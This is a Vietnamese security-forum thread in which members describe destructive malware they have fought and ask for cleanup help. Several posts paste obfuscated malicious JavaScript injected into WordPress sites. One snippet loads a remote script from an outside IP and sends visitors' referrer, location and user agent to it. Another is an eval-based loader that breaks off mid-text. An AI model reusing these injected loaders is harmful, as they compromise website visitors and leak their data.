banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi?  XML
  [Question]   Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 02/03/2009 10:13:16 (+0700) | #1 | 171581
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
Mình lập chủ đề này với mong muốn mọi người cùng nhau chia sẻ những thông tin ( tên tuổi được các antivirus phân loại , nguồn gốc..) về các malware (virus, trojan, worm, rootkit ... ) phá hoại đặc biệt nguy hiểm ( đơn thuần phá hoại, không được tạo ra với mục đích chính là đánh cắp thông tin ) và các triệu chứng đi kèm để mọi người có thể cùng nhau nâng cao hiểu biết để phòng tránh .
Các thắc mắc về diệt từng malware cụ thể , đề nghị các bạn đừng gửi vào đây để tránh làm loãng chủ đề .
Mong các bạn ủng hộ và tham gia nhiệt tình smilie .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 22/03/2009 08:00:29 (+0700) | #2 | 174142
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
Nếu bản thân các bạn đang gặp khó khăn do malware và có thể cung cấp mẫu malware phá hoại phù hợp với chủ đề topic (bằng cách nén lại+đặt password là malware và upload lên 1 host nào đó và đưa link cho mình ), nếu điều kiện + năng lực cho phép và có bạn yêu cầu, mình ( và có thể nhiều bạn khác nữa ) sẽ mở topic riêng cho loại virus đó , hướng dẫn xử lí cụ thể .
Lưu ý :
Nên đưa link cho mình qua private message , ghi rõ triệu chứng của malware và link của chủ đề này .
Nếu mẫu malware không phù hợp với chủ đề , mình sẽ thông báo trong chủ đề này là đã nhận được mẫu và nội dung không phù hợp .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 22/03/2009 08:29:37 (+0700) | #3 | 174146
[Avatar]
sadboy309
Member

[Minus]    0    [Plus]
Joined: 04/11/2008 00:47:18
Messages: 90
Location: UnderWorld
Offline
[Profile] [PM]
À con khủng khiếp đối với mình là cái con đã làm cho máy mình Login xong Log out liên tục, con này thực ra đã diệt xong nhưng sau khi mình Restart máy lại thì không còn vào được Win nữa ^^ , Hix mình mất 1 tuần lễ chạy lên chạy xuống mấy cái tiệm Net để lên diễn đàn tìm cách giải quyết.
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 22/03/2009 08:54:23 (+0700) | #4 | 174150
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
Bạn có thể cho biết tên tuổi và gửi mẫu virus ( nếu được ) không ?
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 22/03/2009 09:18:57 (+0700) | #5 | 174152
[Avatar]
sadboy309
Member

[Minus]    0    [Plus]
Joined: 04/11/2008 00:47:18
Messages: 90
Location: UnderWorld
Offline
[Profile] [PM]
Mình nhớ nó có File là Image.exe , sau khi Nod32 luộc nó thì mình ko Login vào Win được nữa.
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 22/03/2009 09:35:47 (+0700) | #6 | 174155
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

sadboy309 wrote:
Mình nhớ nó có File là Image.exe , sau khi Nod32 luộc nó thì mình ko Login vào Win được nữa. 

Rất tiếc là với chỉ riêng tên file này và tên antivirus chưa đủ để xác định tên tuổi malware .
Mời mọi người tiếp tục .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 22/03/2009 10:24:36 (+0700) | #7 | 174166
[Avatar]
kamikazeq
Member

[Minus]    0    [Plus]
Joined: 04/07/2006 03:20:53
Messages: 837
Location: Panic Malware Planet
Offline
[Profile] [PM] [Yahoo!]
Uầy. Rất rất nhiều Con làm chuyện ấy. Không vào được win do logoff cũng chỉ có 1-2 nguyên nhân tới lui.
Diệt Virus xong, khoan RE máy, kiểm tra và Fix ngay 2 thứ :

1) File userinit.exe còn tồn tại không ?

2) Reg key userinit đến file userinit.exe còn đúng đường dẫn không ?
IDM 5.18 http://tinyurl.com/pl2ejj | Quick Remove Malware http://tinyurl.com/lbbm9x - http://tinyurl.com/arna6g
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 22/03/2009 11:00:53 (+0700) | #8 | 174170
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
Đúng như kamikazeq nói , nếu chỉ khiến bạn sau khi diệt virus, "Login xong Log out liên tục" thì chưa đủ để xét vào những loại malware phá hoại đặc biệt nguy hiểm , đó chỉ mới là một dấu hiệu đơn giản thôi .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 22/03/2009 12:29:32 (+0700) | #9 | 174179
[Avatar]
sadboy309
Member

[Minus]    0    [Plus]
Joined: 04/11/2008 00:47:18
Messages: 90
Location: UnderWorld
Offline
[Profile] [PM]
Thì nó là con làm mình mệt nhất thôi vì mình có thói quen tốt nên rất rất ít bị dính Virus trên máy smilie .
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống c 12/04/2009 13:35:21 (+0700) | #10 | 176818
evarist
Member

[Minus]    0    [Plus]
Joined: 10/04/2009 18:54:46
Messages: 8
Offline
[Profile] [PM]
Loại nguy hiểm nhất em gặp cho đến giờ là Kido.ih.Giờ chắc nó không nguy hiểm mấy nữa nhỉ ?
Con này không hiểu sao Kas của em up to date có nhận ra mà không delete được.Các anh có thể chỉ cho em biết lý do không ạ ?
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống c 12/04/2009 23:58:01 (+0700) | #11 | 176861
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

evarist wrote:
Loại nguy hiểm nhất em gặp cho đến giờ là Kido.ih.Giờ chắc nó không nguy hiểm mấy nữa nhỉ ?
Con này không hiểu sao Kas của em up to date có nhận ra mà không delete được.Các anh có thể chỉ cho em biết lý do không ạ ? 

Nếu muốn nhận sự giúp đỡ , bạn xem lại 2 post đầu tiên trong topic này và làm theo đầy đủ . Tốt nhất là bạn tham gia vào topic này :
/hvaonline/posts/list/28558.html
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 13/04/2009 10:29:11 (+0700) | #12 | 176936
evarist
Member

[Minus]    0    [Plus]
Joined: 10/04/2009 18:54:46
Messages: 8
Offline
[Profile] [PM]
Ủa em có post bài trong topic đó rồi mà.Trong đó em còn nêu ra 1 vài câu hỏi nhưng có ai reply đâu anh.Anh bolzano hơn em 1 tuổi mà anh giỏi thật đấy ạ,em khâm phục quá.
Tuy Kas không diệt được nhưng em cũng diệt được bằng tay (trong ổ USB mà) nên cũng không vấn đề lắm,chủ yếu là tại sao Kas phát hiện ra mà không diệt,em nhấn vào disinfect nó toàn bắt quarantire thôi.
Dù sao cũng cám ơn anh đã nhắc nhở smilie
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 14/04/2009 04:07:56 (+0700) | #13 | 177027
[Avatar]
angel_of_devil
Member

[Minus]    0    [Plus]
Joined: 23/10/2004 14:57:09
Messages: 154
Offline
[Profile] [PM]
Lần khủng khiếp nhất cho đến giờ ở cty mình là dính con Dasfer - giả mạo gateway của Tàu. Còn mấy con như kiểu login/logoff có gặp nhưng ko mất nhiều thời gian để xử lý.
Ngoảnh nhìn lại cuộc đời như giấc mộng
Được mất bại thành bỗng chốc hoá hư không
[Up] [Print Copy]
  [Question]   Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 14/04/2009 05:44:08 (+0700) | #14 | 177041
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

angel_of_devil wrote:
Lần khủng khiếp nhất cho đến giờ ở cty mình là dính con Dasfer - giả mạo gateway của Tàu. Còn mấy con như kiểu login/logoff có gặp nhưng ko mất nhiều thời gian để xử lý. 

Hì, cảm ơn bạn đã chia sẻ , con Dasfer đúng là khá vất vả khi mình vật lộn với nó qua giới thiệu của kamikazeq , mình cũng xếp nó vào những malware phá hoại nguy hiểm .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 15/02/2012 11:30:51 (+0700) | #15 | 253867
paranoidx
Member

[Minus]    0    [Plus]
Joined: 07/12/2007 10:35:41
Messages: 9
Offline
[Profile] [PM]
Không biết ở đây còn nhận hàng không. Mình bị 1 con gì chả biết, nó lây lan trên website của mình, đây là đoạn mã của nó :

var _0x80d0=["\x64\x67\x6C\x6C\x68\x67\x75\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x32\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0x80d0[1]](_0x80d0[0]);if(!element){dawdafraawegdhdhd=document[_0x80d0[2]];gfjlhggfdghdd=escape(document[_0x80d0[3]]);hgfjkgkffgsdgd=escape(navigator[_0x80d0[4]]);var js=document[_0x80d0[6]](_0x80d0[5]);js[_0x80d0[7]]=_0x80d0[0];js[_0x80d0[8]]=_0x80d0[9]+gfjlhggfdghdd+_0x80d0[10]+dawdafraawegdhdhd+_0x80d0[11]+hgfjkgkffgsdgd;var head=document[_0x80d0[13]](_0x80d0[12])[0];head[_0x80d0[14]](js);} ;

Hiện tại mình đã hồi phục. Nhưng ko biết còn bị nữa không.

Bạn có thể cho mình biết cách nào nó đã lây vào các file *.js có trong host của mình không ? các file js đều là hàm chạy nội bộ chỉ xử lý animation, mình dùng wordpress.

Thân,
[Up] [Print Copy]
  [Question]   Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 20/02/2012 12:42:36 (+0700) | #16 | 254629
yaibakitara
Member

[Minus]    0    [Plus]
Joined: 10/01/2011 12:16:54
Messages: 1
Offline
[Profile] [PM]
tại sao khi post bài avira 2012 báo la HVA có virus ,malware , unwanted program ?

Warning

In order not to compromise your security, this page will not be accessed
A virus or unwanted program was found in the HTTP data of the requested page.



Requested URL: /hvaonline/posts/review/0/27945.html
Information: Contains recognition pattern of the JS/Infected.A Java script virus 

[Up] [Print Copy]
  [Question]   Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 20/02/2012 13:10:24 (+0700) | #17 | 254634
acoustics89
Member

[Minus]    0    [Plus]
Joined: 08/07/2011 10:17:19
Messages: 50
Offline
[Profile] [PM]

paranoidx wrote:
Không biết ở đây còn nhận hàng không. Mình bị 1 con gì chả biết, nó lây lan trên website của mình, đây là đoạn mã của nó :

var _0x80d0=["\x64\x67\x6C\x6C\x68\x67\x75\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x32\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0x80d0[1]](_0x80d0[0]);if(!element){dawdafraawegdhdhd=document[_0x80d0[2]];gfjlhggfdghdd=escape(document[_0x80d0[3]]);hgfjkgkffgsdgd=escape(navigator[_0x80d0[4]]);var js=document[_0x80d0[6]](_0x80d0[5]);js[_0x80d0[7]]=_0x80d0[0];js[_0x80d0[8]]=_0x80d0[9]+gfjlhggfdghdd+_0x80d0[10]+dawdafraawegdhdhd+_0x80d0[11]+hgfjkgkffgsdgd;var head=document[_0x80d0[13]](_0x80d0[12])[0];head[_0x80d0[14]](js);} ;

Hiện tại mình đã hồi phục. Nhưng ko biết còn bị nữa không.

Bạn có thể cho mình biết cách nào nó đã lây vào các file *.js có trong host của mình không ? các file js đều là hàm chạy nội bộ chỉ xử lý animation, mình dùng wordpress.

Thân, 


TimThumb trong theme có lỗ hổng , và lỗ hổng này cũng bị khai thác khá nhiều rồi
http://www.exploit-db.com/wordpress-timthumb-exploitation

mong bạn bol có thể chỉ giáo thêm, về phần này mình mù tịt
[Up] [Print Copy]
  [Question]   Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 20/02/2012 13:16:39 (+0700) | #18 | 254636
paranoidx
Member

[Minus]    0    [Plus]
Joined: 07/12/2007 10:35:41
Messages: 9
Offline
[Profile] [PM]
Mình cũng rất hy vọng sớm có cách chữa trị, hiện tại mình cũng chỉ biết xoá tay, mà có vẻ chọi không lại vụ này rồi, vì file JS thì nhiều.
[Up] [Print Copy]
  [Question]   Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? 20/02/2012 13:53:34 (+0700) | #19 | 254639
omaichotnho
Member

[Minus]    0    [Plus]
Joined: 21/09/2010 21:05:22
Messages: 9
Offline
[Profile] [PM]
Giúp mình với mọi người!
web mình mới bị dính mã độc rồi!
huhu ! google cho tụt hàng website mình rồi!
mình không biết vào file nào để chỉnh sửa nữa!
mình đang xài wordpress!


1- Kaspersky thì báo:

2- Mình vào webmaster tool thì google báo!

<script type='text/javascript'>var a=!1;o_vrg = "\x6C\x6F\x6
E\x6C\x79";if(!document.cookie.match(o_vrg)){if(window.docum
ent)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===
0){ss='';try{if(/12/.exec(23).index==0);}catch(qqq){s=String
;}ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[3.5,3
.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,4
9.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.
5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,2
3,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19
,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5
,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49
.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,1
8.5,51,57,57,55,28,22.5,22.5,56.5,49.5,53.5,51.5,55,56,54.5,
22,57.5,52.5,22,53.5,54,22.5,51.5,54,22,48.5,50.5,51.5,30.5,
24,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,4
9.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,5
3,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,2
8,51
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|